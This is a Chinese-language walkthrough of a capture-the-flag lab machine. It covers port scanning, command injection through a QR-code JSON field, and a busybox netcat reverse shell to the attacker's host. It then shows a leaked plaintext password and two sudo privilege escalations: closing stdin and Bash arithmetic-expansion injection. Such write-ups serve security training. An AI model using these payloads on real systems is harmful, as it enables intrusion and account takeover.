Mazesec_115final

靶机来源:QQ群-660930334

难度:Easy

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 15:28 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00065s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00095s latency).
MAC Address: 08:00:27:52:FA:08 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.72
Host is up (0.00062s latency).
MAC Address: 08:00:27:76:A1:8B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.52 seconds

靶机IP:192.168.2.72

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.72                
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 15:28 +0800
Nmap scan report for 192.168.2.72
Host is up (0.0026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:76:A1:8B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 60.40 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.72
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 15:30 +0800
Nmap scan report for 192.168.2.72
Host is up (0.00067s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: QR Code Parser
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:76:A1:8B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds

3.udp扫描

1

二、服务枚举与漏洞发现

1、HTTP 服务枚举

访问80端口,是一个二维码解析的功能 img

构造一个包含json的payload,必须以username开头

1
{"username":"$(id)"}

测试发现能够成功解析 img

三、获取shell

构造反弹shell的脚本

1
{"username":"$(busybox nc 192.168.2.4 4444 -e /bin/bash)"}

成功获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.72] 47096
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

四、权限提升

1、获取suraxddq权限

查看

1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@115final:/var/www/html$ find / -user suraxddq 2>/dev/null
/usr/local/bin/irc_bot.py
/home/suraxddq
/home/suraxddq/.bash_logout
/home/suraxddq/.bashrc
/home/suraxddq/.profile
www-data@115final:/var/www/html$ ls -la /usr/local/bin/
total 24
drwxr-xr-x  2 root     root     4096 Jan 19 21:28 .
drwxr-xr-x 10 root     root     4096 Mar 18  2025 ..
-rwxr-xr-x  1 root     root      248 Apr  1  2025 calc-prorate
-rwxr-x---  1 suraxddq suraxddq 5744 Apr  5  2025 irc_bot.py
-rwxr-xr-x  1 root     root      144 Jan 19 21:28 monitoring-service

/usr/local/bin/monitoring-service 中找到suraxddq的密码

1
2
3
4
5
6
www-data@115final:/var/www/html$ cat /usr/local/bin/monitoring-service 
#!/bin/bash
while true; do
        exec -a "service --user suraxddq --password YqsS2MVr2Gvd13LLILdL --host localhost --port 8080" sleep infinity

done

使用凭证:suraxddq:YqsS2MVr2Gvd13LLILdL进行登录

1
2
3
4
┌──(root㉿kali)-[~/miaosec]
└─# ssh suraxddq@192.168.2.72            
suraxddq@115final:~$ id
uid=1000(suraxddq) gid=1000(suraxddq) groups=1000(suraxddq)

2、获取root权限

查看sudo -l

1
2
3
4
5
6
suraxddq@115final:~$ sudo -l
Matching Defaults entries for suraxddq on 115final:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User suraxddq may run the following commands on 115final:
    (ALL) NOPASSWD: /opt/review.sh

用户 suraxddq 有 sudo 权限,并且设置了 secure_path 环境变量,因此脚本里即使存在相对路径命令也不能劫持

查看脚本的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
suraxddq@115final:~$ cat /opt/review.sh 
#!/bin/bash


echo "Just Type something."
read Never_Show < /root/root.txt
read Never_Show
echo "$Never_Show"

# review for memory LingMj
# add a Human test

a=$RANDOM$RANDOM$RANDOM
echo "Human Test Number: $a"
read -p "Please Input Number: " b
if [ $((b-a)) != 0 ];then
        exit 1;
fi

flag=$(echo $RANDOM$RANDOM$RAMDOM$RANDOM | md5sum | awk '{print $1}')

[[ "$1" == "user"  ]] && echo "flag{fakeuser-$flag}"
[[ "$1" == "root"  ]] && echo "flag{fakeroot-$flag}"
[[ -z "$1"  ]] && echo "flag{fakefake-$flag}"

分析脚本,大致可以分为 3 部分:

  1. 从 /root/root.txt 读取 flag 作为变量 Never_Show 的值,再从标准输入读取一个值覆盖 Never_Show 变量,打印 Never_Show 变量
  2. 生成一个随机数 a,然后读取用户输入的数字 b,如果 b-a 不等于 0,则退出脚本
  3. 根据脚本参数输出不同的 fake flag

因为 sudo 设置了 secure_path 环境变量,因此第三部分的相对路径命令无法劫持,前面两部分可以利用。

方案一:关闭标准输入 第一部分功能:从 /root/root.txt 读取 flag 作为变量 Never_Show 的值,再从标准输入读取一个值覆盖Never_Show 变量,打印 Never_Show 变量

补充:

  • 0 表示标准输入 (stdin)
  • 1 表示标准输出 (stdout)
  • 2 表示标准错误输出 (stderr)
  • &- 表示关闭对应的文件描述符

那么就可以关闭标准输入,让 read 命令无法读取到任何输入导致报错,不会覆盖 Never_Show 变量,从而打印出 /root/root.txt 的内容

1
2
3
4
5
6
7
8
sudo /opt/review.sh 0<&-
suraxddq@115final:~$ sudo /opt/review.sh 0<&-
/bin/bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
Just Type something.
/opt/review.sh: line 6: read: read error: 0: Bad file descriptor
flag{root-572867788d8a1a040d74bda364121406}
Human Test Number: 155561049424270
/opt/review.sh: line 14: read: read error: 0: Bad file descriptor

方案二:Bash算术扩展注入漏洞 第二部分功能:生成一个随机数 a,然后读取用户输入的数字 b,如果 b-a 不等于 0,则退出脚本

1
2
3
if [ $((b-a)) != 0 ];then
        exit 1;
fi

Bash 的算术扩展 $(( expression )) 会对表达式进行计算,在这个过程中,变量会被替换为其值,数组元素的索引也会被解析,可以利用数组索引执行命令

1
2
3
4
5
6
7
8
9
10
suraxddq@115final:~$ sudo /opt/review.sh
/bin/bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
Just Type something.
1
1
Human Test Number: 29711174599858
Please Input Number: vvv[$(su 1>&2)]
bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
root@115final:/home/suraxddq# id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

1
2
3
root@115final:/home/suraxddq# cat /root/root.txt /home/suraxddq/user.txt 
flag{root-572867788d8a1a040d74bda364121406}
flag{user-eee7926ebbdb651bebe39803163b70ab}
Maze-sec
#QR_code_Parser #Bash算术扩展注入 #标准输入
Mazesec_115final
http://miao-sec.github.io/Maze-sec/Mazesec-115final/
作者
Miao
发布于
2026年2月5日
许可协议
BY-MIAO